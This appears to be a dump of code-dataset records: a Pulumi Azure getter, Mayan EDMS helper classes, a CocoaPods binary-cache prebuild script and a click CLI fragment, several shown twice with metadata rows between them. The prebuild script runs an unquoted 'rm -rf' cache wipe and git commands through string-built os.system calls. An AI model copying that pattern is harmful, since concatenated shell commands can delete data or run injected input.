if orchestration_mode and not isinstance(orchestration_mode, str):
raise TypeError("Expected argument 'orchestration_mode' to be a str")
pulumi.set(__self__, "orchestration_mode", orchestration_mode)
if overprovision and not isinstance(overprovision, bool):
raise TypeError("Expected argument 'overprovision' to be a bool")
pulumi.set(__self__, "overprovision", overprovision)
if plan and not isinstance(plan, dict):
raise TypeError("Expected argument 'plan' to be a dict")
pulumi.set(__self__, "plan", plan)
if platform_fault_domain_count and not isinstance(platform_fault_domain_count, int):
raise TypeError("Expected argument 'platform_fault_domain_count' to be a int")
pulumi.set(__self__, "platform_fault_domain_count", platform_fault_domain_count)
if provisioning_state and not isinstance(provisioning_state, str):
raise TypeError("Expected argument 'provisioning_state' to be a str")
pulumi.set(__self__, "provisioning_state", provisioning_state)
if proximity_placement_group and not isinstance(proximity_placement_group, dict):
raise TypeError("Expected argument 'proximity_placement_group' to be a dict")
pulumi.set(__self__, "proximity_placement_group", proximity_placement_group)
if scale_in_policy and not isinstance(scale_in_policy, dict):
raise TypeError("Expected argument 'scale_in_policy' to be a dict")
pulumi.set(__self__, "scale_in_policy", scale_in_policy)
if single_placement_group and not isinstance(single_placement_group, bool):
raise TypeError("Expected argument 'single_placement_group' to be a bool")
pulumi.set(__self__, "single_placement_group", single_placement_group)
if sku and not isinstance(sku, dict):
raise TypeError("Expected argument 'sku' to be a dict")
pulumi.set(__self__, "sku", sku)
if tags and not isinstance(tags, dict):
raise TypeError("Expected argument 'tags' to be a dict")
pulumi.set(__self__, "tags", tags)
if type and not isinstance(type, str):
raise TypeError("Expected argument 'type' to be a str")
pulumi.set(__self__, "type", type)
if unique_id and not isinstance(unique_id, str):
raise TypeError("Expected argument 'unique_id' to be a str")
pulumi.set(__self__, "unique_id", unique_id)
if upgrade_policy and not isinstance(upgrade_policy, dict):
raise TypeError("Expected argument 'upgrade_policy' to be a dict")
pulumi.set(__self__, "upgrade_policy", upgrade_policy)
if virtual_machine_profile and not isinstance(virtual_machine_profile, dict):
raise TypeError("Expected argument 'virtual_machine_profile' to be a dict")
pulumi.set(__self__, "virtual_machine_profile", virtual_machine_profile)
if zone_balance and not isinstance(zone_balance, bool):
raise TypeError("Expected argument 'zone_balance' to be a bool")
pulumi.set(__self__, "zone_balance", zone_balance)
if zones and not isinstance(zones, list):
raise TypeError("Expected argument 'zones' to be a list")
pulumi.set(__self__, "zones", zones)
@property
@pulumi.getter(name="additionalCapabilities")
def additional_capabilities(self) -> Optional['outputs.AdditionalCapabilitiesResponse']:
return pulumi.get(self, "additional_capabilities")
@property
@pulumi.getter(name="automaticRepairsPolicy")
def automatic_repairs_policy(self) -> Optional['outputs.AutomaticRepairsPolicyResponse']:
return pulumi.get(self, "automatic_repairs_policy")
@property
@pulumi.getter(name="doNotRunExtensionsOnOverprovisionedVMs")
def do_not_run_extensions_on_overprovisioned_vms(self) -> Optional[bool]:
return pulumi.get(self, "do_not_run_extensions_on_overprovisioned_vms")
@property
@pulumi.getter(name="extendedLocation")
def extended_location(self) -> Optional['outputs.ExtendedLocationResponse']:
return pulumi.get(self, "extended_location")
@property
@pulumi.getter(name="hostGroup")
def host_group(self) -> Optional['outputs.SubResourceResponse']:
return pulumi.get(self, "host_group")
@property
@pulumi.getter
def id(self) -> str:
return pulumi.get(self, "id")
@property
@pulumi.getter
def identity(self) -> Optional['outputs.VirtualMachineScaleSetIdentityResponse']:
return pulumi.get(self, "identity")
@property
@pulumi.getter
def location(self) -> str:
return pulumi.get(self, "location")
@property
@pulumi.getter
def name(self) -> str:
return pulumi.get(self, "name")
@property
@pulumi.getter(name="orchestrationMode")
def orchestration_mode(self) -> Optional[str]:
return pulumi.get(self, "orchestration_mode")
@property
@pulumi.getter
def overprovision(self) -> Optional[bool]:
return pulumi.get(self, "overprovision")
@property
@pulumi.getter
def plan(self) -> Optional['outputs.PlanResponse']:
return pulumi.get(self, "plan")
@property
@pulumi.getter(name="platformFaultDomainCount")
def platform_fault_domain_count(self) -> Optional[int]:
return pulumi.get(self, "platform_fault_domain_count")
@property
@pulumi.getter(name="provisioningState")
def provisioning_state(self) -> str:
return pulumi.get(self, "provisioning_state")
@property
@pulumi.getter(name="proximityPlacementGroup")
def proximity_placement_group(self) -> Optional['outputs.SubResourceResponse']:
return pulumi.get(self, "proximity_placement_group")
@property
@pulumi.getter(name="scaleInPolicy")
def scale_in_policy(self) -> Optional['outputs.ScaleInPolicyResponse']:
return pulumi.get(self, "scale_in_policy")
@property
@pulumi.getter(name="singlePlacementGroup")
def single_placement_group(self) -> Optional[bool]:
return pulumi.get(self, "single_placement_group")
@property
@pulumi.getter
def sku(self) -> Optional['outputs.SkuResponse']:
return pulumi.get(self, "sku")
@property
@pulumi.getter
def tags(self) -> Optional[Mapping[str, str]]:
return pulumi.get(self, "tags")
@property
@pulumi.getter
def type(self) -> str:
return pulumi.get(self, "type")
@property
@pulumi.getter(name="uniqueId")
def unique_id(self) -> str:
return pulumi.get(self, "unique_id")
@property
@pulumi.getter(name="upgradePolicy")
def upgrade_policy(self) -> Optional['outputs.UpgradePolicyResponse']:
return pulumi.get(self, "upgrade_policy")
@property
@pulumi.getter(name="virtualMachineProfile")
def virtual_machine_profile(self) -> Optional['outputs.VirtualMachineScaleSetVMProfileResponse']:
return pulumi.get(self, "virtual_machine_profile")
@property
@pulumi.getter(name="zoneBalance")
def zone_balance(self) -> Optional[bool]:
return pulumi.get(self, "zone_balance")
@property
@pulumi.getter
def zones(self) -> Optional[Sequence[str]]:
return pulumi.get(self, "zones")
class AwaitableGetVirtualMachineScaleSetResult(GetVirtualMachineScaleSetResult):
# pylint: disable=using-constant-test
def __await__(self):
if False:
yield self
return GetVirtualMachineScaleSetResult(
additional_capabilities=self.additional_capabilities,
automatic_repairs_policy=self.automatic_repairs_policy,
do_not_run_extensions_on_overprovisioned_vms=self.do_not_run_extensions_on_overprovisioned_vms,
extended_location=self.extended_location,
host_group=self.host_group,
id=self.id,
identity=self.identity,
location=self.location,
name=self.name,
orchestration_mode=self.orchestration_mode,
overprovision=self.overprovision,
plan=self.plan,
platform_fault_domain_count=self.platform_fault_domain_count,
provisioning_state=self.provisioning_state,
proximity_placement_group=self.proximity_placement_group,
scale_in_policy=self.scale_in_policy,
single_placement_group=self.single_placement_group,
sku=self.sku,
tags=self.tags,
type=self.type,
unique_id=self.unique_id,
upgrade_policy=self.upgrade_policy,
virtual_machine_profile=self.virtual_machine_profile,
zone_balance=self.zone_balance,
zones=self.zones)
def get_virtual_machine_scale_set(expand: Optional[str] = None,
resource_group_name: Optional[str] = None,
vm_scale_set_name: Optional[str] = None,
opts: Optional[pulumi.InvokeOptions] = None) -> AwaitableGetVirtualMachineScaleSetResult:
__args__ = dict()
__args__['expand'] = expand
__args__['resourceGroupName'] = resource_group_name
__args__['vmScaleSetName'] = vm_scale_set_name
if opts is None:
opts = pulumi.InvokeOptions()
if opts.version is None:
opts.version = _utilities.get_version()
__ret__ = pulumi.runtime.invoke('azure-native:compute:getVirtualMachineScaleSet', __args__, opts=opts, typ=GetVirtualMachineScaleSetResult).value
return AwaitableGetVirtualMachineScaleSetResult(
additional_capabilities=__ret__.additional_capabilities,
automatic_repairs_policy=__ret__.automatic_repairs_policy,
do_not_run_extensions_on_overprovisioned_vms=__ret__.do_not_run_extensions_on_overprovisioned_vms,
extended_location=__ret__.extended_location,
host_group=__ret__.host_group,
id=__ret__.id,
identity=__ret__.identity,
location=__ret__.location,
name=__ret__.name,
orchestration_mode=__ret__.orchestration_mode,
overprovision=__ret__.overprovision,
plan=__ret__.plan,
platform_fault_domain_count=__ret__.platform_fault_domain_count,
provisioning_state=__ret__.provisioning_state,
proximity_placement_group=__ret__.proximity_placement_group,
scale_in_policy=__ret__.scale_in_policy,
single_placement_group=__ret__.single_placement_group,
sku=__ret__.sku,
tags=__ret__.tags,
type=__ret__.type,
unique_id=__ret__.unique_id,
upgrade_policy=__ret__.upgrade_policy,
virtual_machine_profile=__ret__.virtual_machine_profile,
zone_balance=__ret__.zone_balance,
zones=__ret__.zones)
| true | true |
790122bb8ebca2360dd6388ed475881db457f27e | 7,733 | py | Python | mayan/apps/common/classes.py | marumadang/mayan-edms | 2052caada456306ae29b46c4885e45d9a26baaaa | [
"Apache-2.0"
] | null | null | null | mayan/apps/common/classes.py | marumadang/mayan-edms | 2052caada456306ae29b46c4885e45d9a26baaaa | [
"Apache-2.0"
] | null | null | null | mayan/apps/common/classes.py | marumadang/mayan-edms | 2052caada456306ae29b46c4885e45d9a26baaaa | [
"Apache-2.0"
] | null | null | null | from __future__ import unicode_literals
from django.apps import apps
from django.db import models
from django.urls import reverse
from django.utils.encoding import force_text, python_2_unicode_compatible
from django.utils.translation import ugettext
@python_2_unicode_compatible
class Collection(object):
_registry = []
@classmethod
def get_all(cls):
return sorted(cls._registry, key=lambda entry: entry._order)
def __init__(self, label, icon=None, link=None, queryset=None, model=None, order=None):
self._label = label
self._icon = icon
self._link = link
self._queryset = queryset
self._model = model
self._order = order or 99
self.__class__._registry.append(self)
def __str__(self):
return force_text(self.label)
def resolve(self):
self.children = self._get_children()
self.icon = self._icon
self.label = self._label
self.url = None
if self._link:
self.icon = getattr(self._link, 'icon', self._icon)
self.url = reverse(viewname=self._link.view, args=self._link.args)
return ''
def _get_children(self):
if self._queryset:
return self._queryset
else:
if self._model:
return self._model.objects.all()
class Dashboard(object):
_registry = {}
@classmethod
def get(cls, name):
return cls._registry[name]
def __init__(self, name, label):
self.name = name
self.label = label
self.widgets = {}
self.removed_widgets = []
self.__class__._registry[name] = self
def add_widget(self, widget, order=0):
self.widgets[widget] = {'widget': widget, 'order': order}
def get_widgets(self):
"""
Returns a list of widgets sorted by their 'order'.
If two or more widgets have the same 'order', sort by label.
"""
return map(
lambda x: x['widget'],
filter(
lambda x: x['widget'] not in self.removed_widgets,
sorted(
self.widgets.values(),
key=lambda x: (x['order'], x['widget'].label)
)
)
)
def remove_widget(self, widget):
self.removed_widgets.append(widget)
class DashboardWidget(object):
_registry = []
@classmethod
def get_all(cls):
return cls._registry
def __init__(self, label, func=None, icon=None, link=None, queryset=None, statistic_slug=None):
self.label = label
self.icon = icon
self.link = link
self.queryset = queryset
self.func = func
self.statistic_slug = statistic_slug
self.__class__._registry.append(self)
@python_2_unicode_compatible
class ModelAttribute(object):
__registry = {}
@classmethod
def get_for(cls, model, type_names=None):
result = []
try:
for type_name, attributes in cls.__registry[model].iteritems():
if not type_names or type_name in type_names:
result.extend(attributes)
return result
except IndexError:
# We were passed a model instance, try again using the model of
# the instance
# If we are already in the model class, exit with an error
if model.__class__ == models.base.ModelBase:
raise
return cls.get_for[type(model)]
@classmethod
def get_choices_for(cls, model, type_names=None):
return [
(
attribute.name, attribute
) for attribute in cls.get_for(model, type_names)
]
@classmethod
def help_text_for(cls, model, type_names=None):
result = []
for count, attribute in enumerate(cls.get_for(model, type_names), 1):
result.append(
'{}) {}'.format(
count, force_text(attribute.get_display(show_name=True))
)
)
return ' '.join(
[ugettext('Available attributes: \n'), ', \n'.join(result)]
)
def get_display(self, show_name=False):
if self.description:
return '{} - {}'.format(
self.name if show_name else self.label, self.description
)
else:
return force_text(self.name if show_name else self.label)
def __str__(self):
return self.get_display()
def __init__(self, model, name, label=None, description=None, type_name=None):
self.model = model
self.label = label
self.name = name
self.description = description
for field in model._meta.fields:
if field.name == name:
self.label = field.verbose_name
self.description = field.help_text
self.__registry.setdefault(model, {})
if isinstance(type_name, list):
for single_type in type_name:
self.__registry[model].setdefault(single_type, [])
self.__registry[model][single_type].append(self)
else:
self.__registry[model].setdefault(type_name, [])
self.__registry[model][type_name].append(self)
class MissingItem(object):
_registry = []
@classmethod
def get_all(cls):
return cls._registry
def __init__(self, label, condition, description, view):
self.label = label
self.condition = condition
self.description = description
self.view = view
self.__class__._registry.append(self)
@python_2_unicode_compatible
class Filter(object):
_registry = {}
@classmethod
def get(cls, slug):
return cls._registry[slug]
@classmethod
def all(cls):
return cls._registry
def __init__(self, label, slug, filter_kwargs, model, object_permission=None, hide_links=False):
self.label = label
self.slug = slug
self.filter_kwargs = filter_kwargs
self.model = model
self.object_permission = object_permission
self.hide_links = hide_links
self.__class__._registry[self.slug] = self
def __str__(self):
return force_text(self.label)
def get_queryset(self, user):
AccessControlList = apps.get_model(
app_label='acls', model_name='AccessControlList'
)
queryset = self.model.objects.all()
for kwargs in self.filter_kwargs:
queryset = queryset.filter(**kwargs)
queryset = queryset.distinct()
if self.object_permission:
return AccessControlList.objects.filter_by_access(
self.object_permission, user, queryset=queryset
)
else:
return queryset
class Package(object):
_registry = []
@classmethod
def get_all(cls):
return cls._registry
def __init__(self, label, license_text):
self.label = label
self.license_text = license_text
self.__class__._registry.append(self)
class PropertyHelper(object):
"""
Makes adding fields using __class__.add_to_class easier.
Each subclass must implement the `constructor` and the `get_result`
method.
"""
@staticmethod
@property
def constructor(source_object):
return PropertyHelper(source_object)
def __init__(self, instance):
self.instance = instance
def __getattr__(self, name):
return self.get_result(name=name)
def get_result(self, name):
"""
The method that produces the actual result. Must be implemented
by each subclass.
"""
raise NotImplementedError
| 27.916968 | 100 | 0.604423 | from __future__ import unicode_literals
from django.apps import apps
from django.db import models
from django.urls import reverse
from django.utils.encoding import force_text, python_2_unicode_compatible
from django.utils.translation import ugettext
@python_2_unicode_compatible
class Collection(object):
_registry = []
@classmethod
def get_all(cls):
return sorted(cls._registry, key=lambda entry: entry._order)
def __init__(self, label, icon=None, link=None, queryset=None, model=None, order=None):
self._label = label
self._icon = icon
self._link = link
self._queryset = queryset
self._model = model
self._order = order or 99
self.__class__._registry.append(self)
def __str__(self):
return force_text(self.label)
def resolve(self):
self.children = self._get_children()
self.icon = self._icon
self.label = self._label
self.url = None
if self._link:
self.icon = getattr(self._link, 'icon', self._icon)
self.url = reverse(viewname=self._link.view, args=self._link.args)
return ''
def _get_children(self):
if self._queryset:
return self._queryset
else:
if self._model:
return self._model.objects.all()
class Dashboard(object):
_registry = {}
@classmethod
def get(cls, name):
return cls._registry[name]
def __init__(self, name, label):
self.name = name
self.label = label
self.widgets = {}
self.removed_widgets = []
self.__class__._registry[name] = self
def add_widget(self, widget, order=0):
self.widgets[widget] = {'widget': widget, 'order': order}
def get_widgets(self):
return map(
lambda x: x['widget'],
filter(
lambda x: x['widget'] not in self.removed_widgets,
sorted(
self.widgets.values(),
key=lambda x: (x['order'], x['widget'].label)
)
)
)
def remove_widget(self, widget):
self.removed_widgets.append(widget)
class DashboardWidget(object):
_registry = []
@classmethod
def get_all(cls):
return cls._registry
def __init__(self, label, func=None, icon=None, link=None, queryset=None, statistic_slug=None):
self.label = label
self.icon = icon
self.link = link
self.queryset = queryset
self.func = func
self.statistic_slug = statistic_slug
self.__class__._registry.append(self)
@python_2_unicode_compatible
class ModelAttribute(object):
__registry = {}
@classmethod
def get_for(cls, model, type_names=None):
result = []
try:
for type_name, attributes in cls.__registry[model].iteritems():
if not type_names or type_name in type_names:
result.extend(attributes)
return result
except IndexError:
if model.__class__ == models.base.ModelBase:
raise
return cls.get_for[type(model)]
@classmethod
def get_choices_for(cls, model, type_names=None):
return [
(
attribute.name, attribute
) for attribute in cls.get_for(model, type_names)
]
@classmethod
def help_text_for(cls, model, type_names=None):
result = []
for count, attribute in enumerate(cls.get_for(model, type_names), 1):
result.append(
'{}) {}'.format(
count, force_text(attribute.get_display(show_name=True))
)
)
return ' '.join(
[ugettext('Available attributes: \n'), ', \n'.join(result)]
)
def get_display(self, show_name=False):
if self.description:
return '{} - {}'.format(
self.name if show_name else self.label, self.description
)
else:
return force_text(self.name if show_name else self.label)
def __str__(self):
return self.get_display()
def __init__(self, model, name, label=None, description=None, type_name=None):
self.model = model
self.label = label
self.name = name
self.description = description
for field in model._meta.fields:
if field.name == name:
self.label = field.verbose_name
self.description = field.help_text
self.__registry.setdefault(model, {})
if isinstance(type_name, list):
for single_type in type_name:
self.__registry[model].setdefault(single_type, [])
self.__registry[model][single_type].append(self)
else:
self.__registry[model].setdefault(type_name, [])
self.__registry[model][type_name].append(self)
class MissingItem(object):
_registry = []
@classmethod
def get_all(cls):
return cls._registry
def __init__(self, label, condition, description, view):
self.label = label
self.condition = condition
self.description = description
self.view = view
self.__class__._registry.append(self)
@python_2_unicode_compatible
class Filter(object):
_registry = {}
@classmethod
def get(cls, slug):
return cls._registry[slug]
@classmethod
def all(cls):
return cls._registry
def __init__(self, label, slug, filter_kwargs, model, object_permission=None, hide_links=False):
self.label = label
self.slug = slug
self.filter_kwargs = filter_kwargs
self.model = model
self.object_permission = object_permission
self.hide_links = hide_links
self.__class__._registry[self.slug] = self
def __str__(self):
return force_text(self.label)
def get_queryset(self, user):
AccessControlList = apps.get_model(
app_label='acls', model_name='AccessControlList'
)
queryset = self.model.objects.all()
for kwargs in self.filter_kwargs:
queryset = queryset.filter(**kwargs)
queryset = queryset.distinct()
if self.object_permission:
return AccessControlList.objects.filter_by_access(
self.object_permission, user, queryset=queryset
)
else:
return queryset
class Package(object):
_registry = []
@classmethod
def get_all(cls):
return cls._registry
def __init__(self, label, license_text):
self.label = label
self.license_text = license_text
self.__class__._registry.append(self)
class PropertyHelper(object):
@staticmethod
@property
def constructor(source_object):
return PropertyHelper(source_object)
def __init__(self, instance):
self.instance = instance
def __getattr__(self, name):
return self.get_result(name=name)
def get_result(self, name):
raise NotImplementedError
| true | true |
7901230dea21b8daba0a85ea609adab8279744ba | 7,091 | py | Python | lib/command/PythonScripts/prebuild_lib.py | qalandarov/cocoapods-binary-cache | bf1fadc3d9dbd8fb260a83e9ddbb6fd8a17ee0b8 | [
"MIT"
] | null | null | null | lib/command/PythonScripts/prebuild_lib.py | qalandarov/cocoapods-binary-cache | bf1fadc3d9dbd8fb260a83e9ddbb6fd8a17ee0b8 | [
"MIT"
] | null | null | null | lib/command/PythonScripts/prebuild_lib.py | qalandarov/cocoapods-binary-cache | bf1fadc3d9dbd8fb260a83e9ddbb6fd8a17ee0b8 | [
"MIT"
] | null | null | null | # Copyright 2019 Grabtaxi Holdings PTE LTE (GRAB), All rights reserved.
# Use of this source code is governed by an MIT-style license that can be found in the LICENSE file
import subprocess
import re
import os
import glob
from utils.fileutils import FileUtils
from utils.ziputils import ZipUtils
from functools import wraps
from utils.logger import logger
from utils.step import step
# PREBUILD POD LIBS FLOW
# Normal build, it automatically:
# 1. Fetch binary cache from separated repo and unzip it to pod-binary folder.
# 2. pod-binary hook pod install and will use those cached libraries.
# When upgrade a library, need to do:
# 1. Need to run this script to prebuild/delete the libs which have change.
# 2. Commit binary changes to cache repo, set tag for it.
# 3. Update tag in this file. Then submit a new MR.
def print_func_name(func):
@wraps(func)
def echo_func(*func_args, **func_kwargs):
logger.info('🚀 Start func: {}'.format(func.__name__))
return func(*func_args, **func_kwargs)
return echo_func
class PrebuildLib:
def __init__(self, config):
self.cache_repo = config.cache_repo
self.cache_path = config.cache_path
self.prebuild_path = config.prebuild_path
self.generated_dir_name = config.generated_dir_name
self.delta_path = config.delta_path
self.manifest_file = config.manifest_file
self.devpod_cache_repo = config.devpod_cache_repo
self.devpod_cache_path = config.devpod_cache_path
self.devpod_prebuild_output = config.devpod_prebuild_output
self.generated_path = config.generated_path
self.cache_libs_path = config.cache_libs_path
self.devpod_cache_libs_path = config.devpod_cache_libs_path
@print_func_name
def zip_to_cache(self, libName):
if os.path.exists(self.cache_libs_path + libName + '.zip'):
logger.info('Warning: lib {} already exist'.format(libName))
else:
ZipUtils.zip_dir(
'{}/{}'.format(self.generated_path, libName),
'{}/{}.zip'.format(self.cache_libs_path, libName)
)
@print_func_name
def clean_cache(self, libName):
FileUtils.remove_file(self.cache_libs_path + libName + ".zip")
@print_func_name
def zip_all_libs_to_cache(self):
os.system('rm -rf ' + self.cache_libs_path + '/*')
FileUtils.create_dir(self.cache_libs_path)
for dir in FileUtils.listdir_nohidden(self.generated_path):
ZipUtils.zip_dir(self.generated_path + '/' + dir, self.cache_libs_path + '/' + dir + '.zip')
FileUtils.copy_file_or_dir(self.prebuild_path + self.manifest_file, self.cache_path)
def clean_and_pull(self, git_repo_dir):
subprocess.run(['git', '-C', git_repo_dir, 'reset', '--hard'])
subprocess.run(['git', '-C', git_repo_dir, 'clean', '-df'])
subprocess.run(['git', '-C', git_repo_dir, 'checkout', 'master'])
subprocess.run(['git', '-C', git_repo_dir, 'pull', '-X', 'theirs'])
@print_func_name
def fetch_cache(self):
with step('fetch_prebuild_libs'):
if not os.path.exists(self.cache_path):
subprocess.run(['git', 'clone', '--depth=1', self.cache_repo, self.cache_path])
else:
self.clean_and_pull(self.cache_path)
@print_func_name
def unzip_cache(self):
with step('unzip_prebuild_libs'):
FileUtils.remove_dir(self.prebuild_path)
FileUtils.create_dir(self.generated_path)
FileUtils.copy_file_or_dir(self.cache_path + self.manifest_file, self.prebuild_path)
# Unzip libs to pod-binary folder
for zipPath in glob.iglob(self.cache_libs_path + '/*.zip'):
ZipUtils.unzip(zipPath, self.generated_path)
@print_func_name
def fetch_and_apply_cache(self):
self.fetch_cache()
self.unzip_cache()
@print_func_name
def fetch_and_apply_devpod_cache(self):
with step('fetch_and_apply_devpod_cache'):
logger.info('Fetching devpod cache to {}'.format(self.devpod_cache_path))
if not os.path.exists(self.devpod_cache_path):
subprocess.run(['git', 'clone', '--depth=1', self.devpod_cache_repo, self.devpod_cache_path])
else:
self.clean_and_pull(self.devpod_cache_path)
# Unzip devpod libs
devpod_temp_dir = self.prebuild_path + 'devpod/'
logger.info('Unzip from: {} to: {}'.format(self.devpod_cache_libs_path, devpod_temp_dir))
for zip_path in glob.iglob(self.devpod_cache_libs_path + '/*.zip'):
ZipUtils.unzip(zip_path, devpod_temp_dir)
@print_func_name
def has_libs_change(self):
if os.path.exists(self.delta_path):
return True
return False
def push_all_to_git(self, git_dir):
git_input_path = 'git -C ' + self.cache_path
os.system('{} add .'.format(git_input_path))
os.system('{} commit -m "Prebuild pod libs"'.format(git_input_path))
os.system('{} push'.format(git_input_path))
@print_func_name
def prebuild_if_needed(self):
self.fetch_and_apply_cache()
subprocess.run(['bundle', 'exec', 'pod', 'install'], check=True)
# Sync with cache directory
if not os.path.isfile(self.delta_path):
logger.info('No change in prebuilt frameworks')
return
try:
with open(self.delta_path) as f:
FileUtils.create_dir(self.cache_path)
data = f.read()
data = re.sub('"', '', data)
updatedMatches = re.findall(r'Updated: \[(.*)\]', data)
if updatedMatches:
updated = updatedMatches[0].strip()
logger.info("Updated frameworks: {}".format(updated))
if len(updated):
libs = updated.split(',')
for lib in libs:
libName = lib.strip()
self.clean_cache(libName)
self.zip_to_cache(libName)
deletedMatches = re.findall(r'Deleted: \[(.*)\]', data)
if deletedMatches:
deleted = deletedMatches[0].strip()
logger.info('Deleted frameworks: {}'.format(deleted))
if len(deleted):
libs = deleted.split(',')
for lib in libs:
self.clean_cache(lib.strip())
# Copy manifest file
FileUtils.copy_file_or_dir(self.prebuild_path + self.manifest_file, self.cache_path)
self.push_all_to_git(self.cache_path)
except Exception as e:
raise e
@print_func_name
def prebuild_devpod(self):
self.fetch_and_apply_cache()
self.fetch_and_apply_devpod_cache()
subprocess.run(['bundle', 'exec', 'fastlane', 'run', 'cocoapods', 'try_repo_update_on_error:true'], check=True)
| 41.711765 | 119 | 0.624313 |
import subprocess
import re
import os
import glob
from utils.fileutils import FileUtils
from utils.ziputils import ZipUtils
from functools import wraps
from utils.logger import logger
from utils.step import step
def print_func_name(func):
@wraps(func)
def echo_func(*func_args, **func_kwargs):
logger.info('🚀 Start func: {}'.format(func.__name__))
return func(*func_args, **func_kwargs)
return echo_func
class PrebuildLib:
def __init__(self, config):
self.cache_repo = config.cache_repo
self.cache_path = config.cache_path
self.prebuild_path = config.prebuild_path
self.generated_dir_name = config.generated_dir_name
self.delta_path = config.delta_path
self.manifest_file = config.manifest_file
self.devpod_cache_repo = config.devpod_cache_repo
self.devpod_cache_path = config.devpod_cache_path
self.devpod_prebuild_output = config.devpod_prebuild_output
self.generated_path = config.generated_path
self.cache_libs_path = config.cache_libs_path
self.devpod_cache_libs_path = config.devpod_cache_libs_path
@print_func_name
def zip_to_cache(self, libName):
if os.path.exists(self.cache_libs_path + libName + '.zip'):
logger.info('Warning: lib {} already exist'.format(libName))
else:
ZipUtils.zip_dir(
'{}/{}'.format(self.generated_path, libName),
'{}/{}.zip'.format(self.cache_libs_path, libName)
)
@print_func_name
def clean_cache(self, libName):
FileUtils.remove_file(self.cache_libs_path + libName + ".zip")
@print_func_name
def zip_all_libs_to_cache(self):
os.system('rm -rf ' + self.cache_libs_path + '/*')
FileUtils.create_dir(self.cache_libs_path)
for dir in FileUtils.listdir_nohidden(self.generated_path):
ZipUtils.zip_dir(self.generated_path + '/' + dir, self.cache_libs_path + '/' + dir + '.zip')
FileUtils.copy_file_or_dir(self.prebuild_path + self.manifest_file, self.cache_path)
def clean_and_pull(self, git_repo_dir):
subprocess.run(['git', '-C', git_repo_dir, 'reset', '--hard'])
subprocess.run(['git', '-C', git_repo_dir, 'clean', '-df'])
subprocess.run(['git', '-C', git_repo_dir, 'checkout', 'master'])
subprocess.run(['git', '-C', git_repo_dir, 'pull', '-X', 'theirs'])
@print_func_name
def fetch_cache(self):
with step('fetch_prebuild_libs'):
if not os.path.exists(self.cache_path):
subprocess.run(['git', 'clone', '--depth=1', self.cache_repo, self.cache_path])
else:
self.clean_and_pull(self.cache_path)
@print_func_name
def unzip_cache(self):
with step('unzip_prebuild_libs'):
FileUtils.remove_dir(self.prebuild_path)
FileUtils.create_dir(self.generated_path)
FileUtils.copy_file_or_dir(self.cache_path + self.manifest_file, self.prebuild_path)
for zipPath in glob.iglob(self.cache_libs_path + '/*.zip'):
ZipUtils.unzip(zipPath, self.generated_path)
@print_func_name
def fetch_and_apply_cache(self):
self.fetch_cache()
self.unzip_cache()
@print_func_name
def fetch_and_apply_devpod_cache(self):
with step('fetch_and_apply_devpod_cache'):
logger.info('Fetching devpod cache to {}'.format(self.devpod_cache_path))
if not os.path.exists(self.devpod_cache_path):
subprocess.run(['git', 'clone', '--depth=1', self.devpod_cache_repo, self.devpod_cache_path])
else:
self.clean_and_pull(self.devpod_cache_path)
devpod_temp_dir = self.prebuild_path + 'devpod/'
logger.info('Unzip from: {} to: {}'.format(self.devpod_cache_libs_path, devpod_temp_dir))
for zip_path in glob.iglob(self.devpod_cache_libs_path + '/*.zip'):
ZipUtils.unzip(zip_path, devpod_temp_dir)
@print_func_name
def has_libs_change(self):
if os.path.exists(self.delta_path):
return True
return False
def push_all_to_git(self, git_dir):
git_input_path = 'git -C ' + self.cache_path
os.system('{} add .'.format(git_input_path))
os.system('{} commit -m "Prebuild pod libs"'.format(git_input_path))
os.system('{} push'.format(git_input_path))
@print_func_name
def prebuild_if_needed(self):
self.fetch_and_apply_cache()
subprocess.run(['bundle', 'exec', 'pod', 'install'], check=True)
if not os.path.isfile(self.delta_path):
logger.info('No change in prebuilt frameworks')
return
try:
with open(self.delta_path) as f:
FileUtils.create_dir(self.cache_path)
data = f.read()
data = re.sub('"', '', data)
updatedMatches = re.findall(r'Updated: \[(.*)\]', data)
if updatedMatches:
updated = updatedMatches[0].strip()
logger.info("Updated frameworks: {}".format(updated))
if len(updated):
libs = updated.split(',')
for lib in libs:
libName = lib.strip()
self.clean_cache(libName)
self.zip_to_cache(libName)
deletedMatches = re.findall(r'Deleted: \[(.*)\]', data)
if deletedMatches:
deleted = deletedMatches[0].strip()
logger.info('Deleted frameworks: {}'.format(deleted))
if len(deleted):
libs = deleted.split(',')
for lib in libs:
self.clean_cache(lib.strip())
# Copy manifest file
FileUtils.copy_file_or_dir(self.prebuild_path + self.manifest_file, self.cache_path)
self.push_all_to_git(self.cache_path)
except Exception as e:
raise e
@print_func_name
def prebuild_devpod(self):
self.fetch_and_apply_cache()
self.fetch_and_apply_devpod_cache()
subprocess.run(['bundle', 'exec', 'fastlane', 'run', 'cocoapods', 'try_repo_update_on_error:true'], check=True)
| true | true |
79012342a58987c1a94702b57c773254489bb8ac | 8,527 | py | Python | utd/script.py | bmccary/utd | 0c21aea1136403279c80c0db041cb8107d96e781 | [
"MIT"
] | null | null | null | utd/script.py | bmccary/utd | 0c21aea1136403279c80c0db041cb8107d96e781 | [
"MIT"
] | null | null | null | utd/script.py | bmccary/utd | 0c21aea1136403279c80c0db041cb8107d96e781 | [
"MIT"
] | null | null | null |
from prettytable import PrettyTable
from collections import OrderedDict
def _fieldnames(rows):
def g():
for row in rows:
yield from row
d = OrderedDict((k, None) for k in g())
return list(d.keys())
def _echo_table(rows):
if not rows: return
fieldnames = _fieldnames(rows)
table = PrettyTable(fieldnames)
table.align = 'l'
for row in rows:
table.add_row([row[k] or '' for k in fieldnames])
click.echo(table.get_string())
def _echo_row(row):
if not row: return
table = PrettyTable(row.keys())
table.align = 'l'
table.add_row(row.values())
click.echo(table.get_string())
def _echo_item(x):
if not x: return
click.echo(x)
import os
import logging
import click
import click_log
from . import config
_logger = logging.getLogger(__name__)
click_log.basic_config(_logger)
@click.group()
def cli():
pass
from . import blackboard
@cli.group(name='blackboard')
def cli_blackboard():
pass
@cli_blackboard.command(name='download', help='Download')
@click.option('--get-password', default=None, help='Command to evaluate to get password (default is to ask).')
@click.option('--netid', default=None, help='Use this NetID.')
@click.argument('link_text', type=click.STRING)
@click_log.simple_verbosity_option(_logger)
def cli_blackboard_download(netid, get_password, link_text):
if netid is None: netid = config.NETID
if get_password is None: get_password = config.get_password
x = blackboard.download(netid=netid, get_password=get_password, link_text=link_text)
_echo_item(x)
@cli_blackboard.command(name='upload', help='Upload')
@click.option('--get-password', default=None, help='Command to evaluate to get password (default is to ask).')
@click.option('--netid', default=None, help='Use this NetID.')
@click.argument('link_text', type=click.STRING)
@click.argument('path', type=click.STRING)
@click_log.simple_verbosity_option(_logger)
